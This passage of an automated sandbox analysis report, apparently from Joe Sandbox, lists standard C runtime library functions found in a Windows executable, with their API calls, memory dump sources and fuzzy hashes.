                                                                                                                                                                    • Part of subcall function 00007FF72C9CF4E0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF72C9CF5E8
                                                                                                                                                                    • Part of subcall function 00007FF72C9F91B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C9F91DB
                                                                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00007FF72C9D8957
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskCpp_errorThrow__invalid_parameter_noinfo_invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 88918588-578493202
                                                                                                                                                                  • Opcode ID: 3e9fa4afad1f804027e16793f4523684f35e45826ac4d6c77fa56dddb58817dd
                                                                                                                                                                  • Instruction ID: ba726be6940c00bff5749c7bbb8fde39f5cef153acff7b4b5f721f13620bf22c
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e9fa4afad1f804027e16793f4523684f35e45826ac4d6c77fa56dddb58817dd
                                                                                                                                                                  • Instruction Fuzzy Hash: DA217F36608B8085E720EF12E8552AAB3A4FB98BE0F868431EECD47759DE3CD151CB40
                                                                                                                                                                  Function 00007FF72C9FC2C0 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                  • Instruction ID: 31fa4682b83875de942e99e37b2f2859d62a79f1e21e23aa8a8a9dbbfe44287e
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                  • Instruction Fuzzy Hash: 8751C661B09A5246F634BA259C006BAE599FB64BF8F948730DDED477C5CE7CD401CE20
                                                                                                                                                                  Function 00007FF72C9CDD80 Relevance: 3.1, APIs: 2, Instructions: 127COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                  • Instruction ID: ad2f63a1c7d1c6076ecd7c18483a7ee6c2becfff27176d9a030e7a8cbf2f582b
                                                                                                                                                                  • Opcode Fuzzy Hash: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F41D633B05A5585EB519E2AD800378A7A1FB68FE8F944432DE4D17B58DE38D546CB20
                                                                                                                                                                  Function 00007FF72C9F92E4 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                  • Instruction ID: c41683246f227b225ca24433e6059d29a976f6e7bf6f292a4441c8e95d6e15e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                  • Instruction Fuzzy Hash: D331E432A1860689EA50FB14EC505BCB365EBB0BE4FDA0131E68E477D1DEBCE000CB20
                                                                                                                                                                  Function 00007FF72CA0BFC0 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF72CA0BFAC,?,?,?,?,00000000,00007FF72CA0C0B5), ref: 00007FF72CA0C00C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00007FF72CA0BFAC,?,?,?,?,00000000,00007FF72CA0C0B5), ref: 00007FF72CA0C016
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  • Opcode ID: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                  • Instruction ID: 463a2c91b6b023659dba9e5fdf9f48cc25142d5bc475616e257129791c116716
                                                                                                                                                                  • Opcode Fuzzy Hash: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                  • Instruction Fuzzy Hash: 6111C461A08A8281EA20AB25BC44669E771EB54BF4F944331EE7D077E9DF7CD0548B40
                                                                                                                                                                  Function 00007FF72CA11A00 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF72CA0388A,?,?,?,00007FF72CA03C62,?,?,?,?,00007FF72CA167E8,?,?,?), ref: 00007FF72CA11A14
                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF72CA0388A,?,?,?,00007FF72CA03C62,?,?,?,?,00007FF72CA167E8,?,?,?), ref: 00007FF72CA11A7E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                  • Opcode ID: 402f26751435b582819652335746021fa4bbfe1fd5014001bcf3895cfbb74f1b
                                                                                                                                                                  • Instruction ID: 93ca97c8af2c4c81702811a133023274ac2a52481c6dd769dd5750efb064f682
                                                                                                                                                                  • Opcode Fuzzy Hash: 402f26751435b582819652335746021fa4bbfe1fd5014001bcf3895cfbb74f1b
                                                                                                                                                                  • Instruction Fuzzy Hash: C101A911F1876541EA14BB217C10429A6B0EF64FF0F885234DF5E13BC9DE2CE4428750
                                                                                                                                                                  Function 00007FF72C9EE314 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                  • Opcode ID: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                  • Instruction ID: 94ae6bf9fe1750b1642aa8e5ab26920d81b5837146cd8afee5c102a53d72b3cf
                                                                                                                                                                  • Opcode Fuzzy Hash: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 9201D621B0C6C282FB00A729B84072AF794DBF43B4F544035D9DA42B98EFBCD8408F15
                                                                                                                                                                  Function 00007FF72C9F9078 Relevance: 3.0, APIs: 2, Instructions: 31threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1611280651-0
                                                                                                                                                                  • Opcode ID: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                  • Instruction ID: d27c44c6e4e19276891f176c942a9a6324b31325dc91c7376d04cc073e264f14
                                                                                                                                                                  • Opcode Fuzzy Hash: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 32F0F021E0964287FF04BB75AC0667CA2B4EF74B64F840030DD4D43396CF2DA440CB21
                                                                                                                                                                  Function 00007FF72C9F2A38 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                  • Instruction ID: b8e2da1a7b981920729c4eebb8ff5a187c2373103a71693ef67d7124795979fd
                                                                                                                                                                  • Opcode Fuzzy Hash: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                  • Instruction Fuzzy Hash: 38E0E241E0EA0751FE6832B61C566B98048CF39B70FA91B34D9FE042D2AE1CE5928DB0
                                                                                                                                                                  Function 00007FF72CA08340 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  • Opcode ID: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                  • Instruction ID: 377f43f571a7dea0441d64333557672ec62088f1452eb9e59adbfeb75de801c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 74be82d56ef391a05e48391ec7c7a7c4c1a5113b7692c885e2ac2b027a55637c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE04F50E1964243FB147BB17C96AB59171DFB47B0FC44434C90D56251EE2CA5844A65
                                                                                                                                                                  Function 00007FF72CA08550 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72CA083CD,?,?,00000000,00007FF72CA08482), ref: 00007FF72CA085BE
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA083CD,?,?,00000000,00007FF72CA08482), ref: 00007FF72CA085C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                  • Opcode ID: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                  • Instruction ID: f1fdc0b347f5304452a83989675e01e42226fd409db60de9a0d80260d72d54a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 205954a0cb9a5bc48dda8edc75c8b963a8c5605bc07cd61d77332ffa7cc79ed3
                                                                                                                                                                  • Instruction Fuzzy Hash: 2821F620F08A4201FAA07730BC9477D95A1EFA47F8F844235DA2E473D2CE6CF4489B29
                                                                                                                                                                  Function 00007FF72CA09510 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                  • Instruction ID: 4de849330cbbb0588231d1e3a6dd17bedb64c5cd47fc3bcc23fd90d4bb2eee66
                                                                                                                                                                  • Opcode Fuzzy Hash: 80c2eff22136f4c169f0431fb234af93064a5610cb2ce0def08195f1cb992f7f
                                                                                                                                                                  • Instruction Fuzzy Hash: FE41903291860147FA24AB39B940BB9B3B4FB75BE5F940130DA9E436D1DF2DE402CB60
                                                                                                                                                                  Function 00007FF72C9CCF20 Relevance: 1.6, APIs: 1, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                                  • Opcode ID: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                  • Instruction ID: 2d359aada39e56a3da9ba73028af709a811df88e60c2577676b96494588c59fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f2f581e78f95bd5cb904041401751313ae5732a15b65ec4300bfd25b081b8d2
                                                                                                                                                                  • Instruction Fuzzy Hash: A3315836B05B4982EF159F29D49022C7365EB58F98B848032DF4D07368CF3CD891CB50
                                                                                                                                                                  Function 00007FF72CA1695C Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA168A7
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4036615347-0
                                                                                                                                                                  • Opcode ID: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                  • Instruction ID: 199f6835e5350444595f489dbbff95eb8574ea0c740e2db47f4bc03c95a7221d
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d98c4b73ae2db0dcd3f5b2116bc649f4b6edea03ee29548f9e79326a9e3dd55
                                                                                                                                                                  • Instruction Fuzzy Hash: 9621E421B0971242FB25BA69AD04779E6B0EF60BF0F946530DE5C87BC5DE7DE8118B20
                                                                                                                                                                  Function 00007FF72CA0B930 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                  • Instruction ID: 51e6998bc720fa9fcab06d61c2a8fb3a0a5263a93d610f42aec26a23758b1123
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e62b5da85285c3ea154d9c64e7bec3a32060aad3f6a6f68b67314db75222940
                                                                                                                                                                  • Instruction Fuzzy Hash: D5318121A18A1286F7517B65BC41BFCA660EF60BF4F850135DA2D033D2EF7CA4418B31
                                                                                                                                                                  Function 00007FF72C9C0FF0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
